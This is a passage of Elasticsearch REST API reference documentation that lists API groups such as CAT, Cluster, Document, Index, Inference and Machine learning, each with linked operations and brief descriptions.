retrieve information about analytics collections. Behavioral Analytics is an analytics event collection platform. 
You can use it to analyze your users' searching and clicking behavior. Leverage this information to improve the relevance of your search results and identify gaps in your content. + +| API | Description | +| --- | ----------- | +| [Get Collections](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-get-behavioral-analytics) | Lists all behavioral analytics collections. | | [Create Collection](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-put-behavioral-analytics) | Creates a new behavioral analytics collection. | | [Delete Collection](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-delete-behavioral-analytics) | Deletes a behavioral analytics collection. | | [Create Event](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-search-application-post-behavioral-analytics-event) | Sends a behavioral analytics event to a collection. | + +### [Compact and aligned text (CAT)](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-cat) + +The compact and aligned text (CAT) APIs return human-readable text as a response, instead of a JSON object. The CAT APIs are intended only for human consumption using the Kibana console or command line. They are not intended for use by applications. For application consumption, it's recommended to use a corresponding JSON API. + +| API | Description | +| --- | ----------- | +| [Get aliases](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-aliases) | Returns index aliases. | | [Get allocation](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-allocation) | Provides a snapshot of shard allocation across nodes. | | [Get component templates](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-component-templates) | Returns information about component templates. | | [Get count](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-count) | Returns document count for specified indices. | | [Get fielddata](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-fielddata) | Shows fielddata memory usage by field. | | [Get health](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-health) | Returns cluster health status. | | [Get help](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-help) | Shows help for CAT APIs. | | [Get index information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-indices) | Returns index statistics. | | [Get master](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-master) | Returns information about the elected master node. | | [Get ml data frame analytics](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-data-frame-analytics) | Returns data frame analytics jobs. | | [Get ml datafeeds](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-datafeeds) | Returns information about datafeeds. | | [Get ml jobs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-jobs) | Returns anomaly detection jobs. | | [Get ml trained models](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-ml-trained-models) | Returns trained machine learning models. | | [Get nodeattrs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-nodeattrs) | Returns custom node attributes.
| | [Get node information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-nodes) | Returns cluster node info and statistics. | | [Get pending tasks](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-pending-tasks) | Returns cluster pending tasks. | | [Get plugins](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-plugins) | Returns information about installed plugins. | | [Get recovery](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-recovery) | Returns shard recovery information. | | [Get repositories](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-repositories) | Returns snapshot repository information. | | [Get segments](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-segments) | Returns low-level segment information. | | [Get shard information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-shards) | Returns shard allocation across nodes. | | [Get snapshots](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-snapshots) | Returns snapshot information. | | [Get tasks](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-tasks) | Returns information about running tasks. | | [Get templates](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-templates) | Returns index template information. | | [Get thread pool](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-thread-pool) | Returns thread pool statistics. | | [Get transforms](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cat-transforms) | Returns transform information. | + +### [Cluster](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-cluster) + +The cluster APIs enable you to retrieve information about your infrastructure at the cluster, node, or shard level. You can manage cluster settings and voting configuration exclusions, collect node statistics, and retrieve node information. + +| API | Description | +| --- | ----------- | +| [Get cluster health](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-health) | Returns health status of the cluster. | | [Get cluster info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-info) | Returns basic information about the cluster. | | [Reroute cluster](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-reroute) | Manually reassigns shard allocations. | | [Get cluster state](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-state) | Retrieves the current cluster state. | | [Explain shard allocation](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-allocation-explain) | Get explanations for shard allocations in the cluster. | | [Update cluster settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-settings) | Updates persistent or transient cluster settings. | | [Get cluster stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-stats) | Returns cluster-wide statistics, including node, index, and shard metrics. | | [Get cluster pending tasks](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-pending-tasks) | Lists cluster-level tasks that are pending execution.
| | [Get cluster settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-get-settings) | Retrieves the current cluster-wide settings, including persistent and transient settings. | | [Get cluster remote info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-remote-info) | Returns information about configured remote clusters for cross-cluster search and replication. | | [Update cluster voting config exclusions](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-post-voting-config-exclusions) | Update the cluster voting config exclusions by node IDs or node names. | | [Delete voting config exclusions](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-delete-voting-config-exclusions) | Clears voting configuration exclusions, allowing previously excluded nodes to participate in master elections. | + +### [Cluster - Health](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-health_report) + +The cluster health API provides a report on the health status of an Elasticsearch cluster. + +| API | Description | +| --- | ----------- | +| [Get cluster health report](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-health-report) | Returns health status of the cluster, including index-level details. | + +### [Connector](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-connector) + +The connector and sync jobs APIs provide a convenient way to create and manage Elastic connectors and sync jobs in an internal index. + +| API | Description | +| --- | ----------- | +| [Get connector](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-get) | Retrieves a connector configuration. | | [Put connector](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-put) | Creates or updates a connector configuration. | | [Delete connector](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-delete) | Deletes a connector configuration. | | [Start connector sync job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-post) | Starts a sync job for a connector. | | [Get connector sync job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-get) | Retrieves sync job details for a connector. | | [Get all connectors](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-list) | Retrieves a list of all connector configurations. | | [Get all connector sync jobs](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-list) | Retrieves a list of all connector sync jobs. | | [Delete connector sync job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-connector-sync-job-delete) | Deletes a connector sync job. |
+ +### [Cross-cluster replication (CCR)](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-ccr) + +The cross-cluster replication (CCR) APIs enable you to run cross-cluster replication operations, such as creating and managing follower indices or auto-follow patterns. With CCR, you can replicate indices across clusters to continue handling search requests in the event of a datacenter outage, prevent search volume from impacting indexing throughput, and reduce search latency by processing search requests in geo-proximity to the user. + +| API | Description | +| --- | ----------- | +| [Create or update auto-follow pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-put-auto-follow-pattern) | Creates or updates an auto-follow pattern. | | [Delete auto-follow pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-delete-auto-follow-pattern) | Deletes an auto-follow pattern. | | [Get auto-follow pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-get-auto-follow-pattern) | Retrieves auto-follow pattern configuration. | | [Pause auto-follow pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-pause-auto-follow-pattern) | Pauses an auto-follow pattern. | | [Resume auto-follow pattern](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-resume-auto-follow-pattern) | Resumes a paused auto-follow pattern. | | [Forget follower](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-forget-follower) | Removes follower retention leases from leader index. | | [Create follower](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow) | Creates a follower index. | | [Get follower](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow-info) | Retrieves information about follower indices. | | [Get follower stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-follow-stats) | Retrieves stats about follower indices. | | [Pause follower](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-pause-follow) | Pauses replication of a follower index. | | [Resume follower](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-resume-follow) | Resumes replication of a paused follower index. | | [Unfollow index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-unfollow) | Converts a follower index into a regular index. | | [Get CCR stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ccr-stats) | Retrieves overall CCR statistics for the cluster. | + +### [Data stream](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-data-stream) + +The data stream APIs enable you to create and manage data streams and data stream lifecycles. A data stream lets you store append-only time series data across multiple indices while giving you a single named resource for requests.
Data streams are well-suited for logs, events, metrics, and other continuously generated data. + +| API | Description | +| --- | ----------- | +| [Create data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-create-data-stream) | Creates a new data stream. | | [Delete data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-data-stream) | Deletes an existing data stream. | | [Get data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-data-stream) | Retrieves one or more data streams. | | [Modify data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-modify-data-stream) | Updates the backing index configuration for a data stream. | | [Promote data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-promote-data-stream) | Promotes a replicated data stream to a regular data stream. | | [Data streams stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-data-streams-stats) | Returns statistics about data streams. | | [Migrate to data stream](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-migrate-to-data-stream) | Migrates an index or indices to a data stream. | + +### [Document](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-document) + +The document APIs enable you to create and manage documents in an {{es}} index. + +| API | Description | +| --- | ----------- | +| [Index document](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-create) | Indexes a document into a specific index. | | [Get document](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get) | Retrieves a document by ID. | | [Delete document](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete) | Deletes a document by ID. | | [Update document](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update) | Updates a document using a script or partial doc. | | [Bulk](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-bulk) | Performs multiple indexing or delete operations in a single API call. | | [Multi-get document](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-mget) | Retrieves multiple documents by ID in one request. | | [Update documents by query](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-update-by-query) | Updates documents that match a query. | | [Delete documents by query](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-delete-by-query) | Deletes documents that match a query. | | [Get term vectors](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-termvectors) | Retrieves term vectors for a document. | | [Multi-termvectors](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-mtermvectors) | Retrieves term vectors for multiple documents. | | [Reindex](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-reindex) | Copies documents from one index to another. | | [Reindex Rethrottle](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-reindex-rethrottle) | Changes the throttle for a running reindex task. | | [Explain](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-explain) | Explains how a document matches (or doesn't match) a query.
| | [Get source](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-get-source) | Retrieves the source of a document by ID. | | [Exists](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-exists) | Checks if a document exists by ID. | + +### [Enrich](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-enrich) + +The enrich APIs enable you to manage enrich policies. An enrich policy is a set of configuration options used to add the right enrich data to the right incoming documents. + +| API | Description | +| --- | ----------- | +| [Create or update enrich policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-put-policy) | Creates or updates an enrich policy. | | [Get enrich policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-get-policy) | Retrieves enrich policy definitions. | | [Delete enrich policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-delete-policy) | Deletes an enrich policy. | | [Execute enrich policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-execute-policy) | Executes an enrich policy to create an enrich index. | | [Get enrich stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-enrich-stats) | Returns enrich coordinator and policy execution statistics. | + +### [EQL](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-eql) + +The EQL APIs enable you to run EQL-related operations. Event Query Language (EQL) is a query language for event-based time series data, such as logs, metrics, and traces. + +| API | Description | +| --- | ----------- | +| [Submit EQL search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-search) | Runs an EQL search. | | [Get EQL search status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-get-status) | Retrieves the status of an asynchronous EQL search. | | [Get EQL search results](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-get) | Retrieves results of an asynchronous EQL search. | | [Delete EQL search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-eql-delete) | Cancels an asynchronous EQL search. | + +### [ES|QL](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-esql) + +The ES|QL APIs enable you to run ES|QL-related operations. The Elasticsearch Query Language (ES|QL) provides a powerful way to filter, transform, and analyze data stored in Elasticsearch, and in the future in other runtimes. + +| API | Description | +| --- | ----------- | +| [ES\|QL Query](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-query) | Executes an ES\|QL query synchronously. | | [ES\|QL Async Submit](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query) | Submits an ES\|QL query to run asynchronously. | | [ES\|QL Async Get](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-get) | Retrieves results of an asynchronous ES\|QL query. | | [ES\|QL Async Delete](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-esql-async-query-delete) | Cancels an asynchronous ES\|QL query. | + +### [Features](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-features) + +The feature APIs enable you to introspect and manage features provided by {{es}} and {{es}} plugins.
+ +| API | Description | +| --- | ----------- | +| [Get Features](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-features-get-features) | Lists all available features in the cluster. | +| [Reset Features](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-features-reset-features) | Resets internal state for system features. | + +### [Fleet](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-fleet) + +The Fleet APIs support Fleet’s use of Elasticsearch as a data store for internal agent and action data. + +| API | Description | +| --- | ----------- | +| [Run Multiple Fleet Searches](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-fleet-msearch) | Runs several Fleet searches with a single API request. | +| [Run a Fleet Search](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-fleet-search) | Runs a Fleet search. | +| [Get global checkpoints](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-fleet-global-checkpoints) | Get the current global checkpoints for an index. | + +### [Graph explore](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-graph) + +The graph explore APIs enable you to extract and summarize information about the documents and terms in an {{es}} data stream or index. + +| API | Description | +| --- | ----------- | +| [Graph Explore](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-graph-explore) | Discovers relationships between indexed terms using relevance-based graph exploration. | + +### [Index](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-indices) + +The index APIs enable you to manage individual indices, index settings, aliases, mappings, and index templates. + +| API | Description | +| --- | ----------- | +| [Create index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-create) | Creates a new index with optional settings and mappings. | +| [Delete index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete) | Deletes an existing index. | +| [Get index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get) | Retrieves information about one or more indices. | +| [Open index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-open) | Opens a closed index to make it available for operations. | +| [Close index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-close) | Closes an index to free up resources. | +| [Shrink index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-shrink) | Shrinks an existing index into a new index with fewer primary shards. | +| [Split index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-split) | Splits an existing index into a new index with more primary shards. | +| [Clone index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-clone) | Clones an existing index into a new index. | +| [Manage index aliases](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-alias) | Manages index aliases. | +| [Update field mappings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-mapping) | Updates index mappings. | +| [Get field mappings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-mapping) | Retrieves index mappings. 
| +| [Get index settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-settings) | Retrieves settings for one or more indices. | +| [Update index settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-settings) | Updates index-level settings dynamically. | +| [Get index templates](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-template) | Retrieves legacy index templates. | +| [Put index template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-template) | Creates or updates a legacy index template. | +| [Delete index template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-template) | Deletes a legacy index template. | +| [Get composable index templates](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-index-template) | Retrieves composable index templates. | +| [Put composable index template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-put-index-template) | Creates or updates a composable index template. | +| [Delete composable index template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-index-template) | Deletes a composable index template. | +| [Get index alias](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-get-alias) | Retrieves index aliases. | +| [Delete index alias](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-delete-alias) | Deletes index aliases. | +| [Refresh index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-refresh) | Refreshes one or more indices, making recent changes searchable. | +| [Flush index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-flush) | Performs a flush operation on one or more indices. | +| [Clear index cache](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-clear-cache) | Clears caches associated with one or more indices. | +| [Force merge index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-forcemerge) | Merges index segments to reduce their number and improve performance. | +| [Freeze index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-freeze) | Freezes an index, making it read-only and minimizing its resource usage. | +| [Unfreeze index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-unfreeze) | Unfreezes a frozen index, making it writeable and fully functional. | +| [Rollover index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-rollover) | Rolls over an alias to a new index when conditions are met. | +| [Resolve index](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-resolve) | Resolves expressions to index names, aliases, and data streams. | +| [Simulate index template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-simulate-index-template) | Simulates the application of a composable index template. | +| [Simulate template](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-simulate-template) | Simulates the application of a legacy index template. 
| | [Reload search analyzers](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-reload-search-analyzers) | Reloads search analyzers for one or more indices. | + +### [Index lifecycle management](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ilm) + +The index lifecycle management APIs enable you to set up policies to automatically manage the index lifecycle. + +| API | Description | +| --- | ----------- | +| [Put Lifecycle Policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-put-lifecycle) | Creates or updates an ILM policy. | | [Get Lifecycle Policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-get-lifecycle) | Retrieves one or more ILM policies. | | [Delete Lifecycle Policy](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-delete-lifecycle) | Deletes an ILM policy. | | [Explain Lifecycle](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-explain-lifecycle) | Shows the current lifecycle step for indices. | | [Move to Step](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-move-to-step) | Manually moves an index to the next step in its lifecycle. | | [Retry Lifecycle Step](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-retry) | Retries the current lifecycle step for failed indices. | | [Start ILM](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-start) | Starts the ILM plugin. | | [Stop ILM](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-stop) | Stops the ILM plugin. | | [Get ILM Status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ilm-get-status) | Returns the status of the ILM plugin. | + +### [Inference](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-inference) + +The inference APIs enable you to create inference endpoints and integrate with machine learning models of different services, such as Amazon Bedrock, Anthropic, Azure AI Studio, Cohere, Google AI, Mistral, OpenAI, or HuggingFace. + +| API | Description | +| --- | ----------- | +| [Put Inference Endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put) | Creates an inference endpoint. | | [Get Inference Endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-get) | Retrieves one or more inference endpoints. | | [Delete Inference Endpoint](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-delete) | Deletes an inference endpoint.
| +| [Infer](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference) | Runs inference using a deployed model. | + +### [Info](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-info) + +The info API provides basic build, version, and cluster information. + +| API | Description | +| --- | ----------- | +| [Get cluster information](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-info) | Returns basic information about the cluster. | + +### [Ingest](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ingest) + +The ingest APIs enable you to manage tasks and resources related to ingest pipelines and processors. + +| API | Description | +| --- | ----------- | +| [Create or update pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-put-pipeline) | Creates or updates an ingest pipeline. | +| [Get pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-get-pipeline) | Retrieves one or more ingest pipelines. | +| [Delete pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-delete-pipeline) | Deletes an ingest pipeline. | +| [Simulate pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-simulate) | Simulates a document through an ingest pipeline. | +| [Get built-in grok patterns](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-processor-grok) | Returns a list of built-in grok patterns. | +| [Get processor types](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-processor-types) | Returns a list of available processor types. | +| [Put pipeline processor](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-put-processor) | Creates or updates a custom pipeline processor. | +| [Delete pipeline processor](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-delete-processor) | Deletes a custom pipeline processor. | + +### [Licensing](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-license) + +The licensing APIs enable you to manage your licenses. + +| API | Description | +| --- | ----------- | +| [Get license](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-get) | Retrieves the current license for the cluster. | +| [Update license](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post) | Updates the license for the cluster. | +| [Delete license](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-delete) | Removes the current license. | +| [Start basic license](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post-start-basic) | Starts a basic license. | +| [Start trial license](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-post-start-trial) | Starts a trial license. | +| [Get the trial status](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-license-get-trial-status) | Returns the status of the current trial license. | + +### [Logstash](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-logstash) + +The logstash APIs enable you to manage pipelines that are used by Logstash Central Management. 
+ +| API | Description | +| --- | ----------- | +| [Create or update Logstash pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-put-pipeline) | Creates or updates a Logstash pipeline. | | [Get Logstash pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-get-pipeline) | Retrieves one or more Logstash pipelines. | | [Delete Logstash pipeline](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-logstash-delete-pipeline) | Deletes a Logstash pipeline. | + +### [Machine learning](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ml) + +The machine learning APIs enable you to retrieve information related to the {{stack}} {{ml}} features. + +| API | Description | +| --- | ----------- | +| [Get machine learning memory stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-memory-stats) | Gets information about how machine learning jobs and trained models are using memory. | | [Get machine learning info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-info) | Gets defaults and limits used by machine learning. | | [Set upgrade mode](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-set-upgrade-mode) | Sets a cluster-wide upgrade_mode setting that prepares machine learning indices for an upgrade. | | [Get ML job stats](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-job-stats) | Retrieves usage statistics for ML jobs. | | [Get ML calendar events](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-calendar-events) | Retrieves scheduled events for ML calendars. | | [Get ML filters](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-filters) | Retrieves ML filters. | | [Put ML filter](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-filter) | Creates or updates an ML filter. | | [Delete ML filter](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-filter) | Deletes an ML filter. | | [Get ML info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-info) | Gets overall ML info. | | [Get ML model snapshots](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-model-snapshots) | Retrieves model snapshots for ML jobs. | | [Revert ML model snapshot](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-revert-model-snapshot) | Reverts an ML job to a previous model snapshot. | | [Delete expired ML data](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-expired-data) | Deletes expired ML results and model snapshots. | + +### [Machine learning anomaly detection](https://www.elastic.co/docs/api/doc/elasticsearch/v9/group/endpoint-ml-anomaly) + +The machine learning anomaly detection APIs enable you to perform anomaly detection activities. + + +| API | Description | +| --- | ----------- | +| [Put Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-put-job) | Creates an anomaly detection job. | | [Get Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-get-jobs) | Retrieves configuration info for anomaly detection jobs. | | [Delete Job](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ml-delete-job) | Deletes an anomaly detection job.
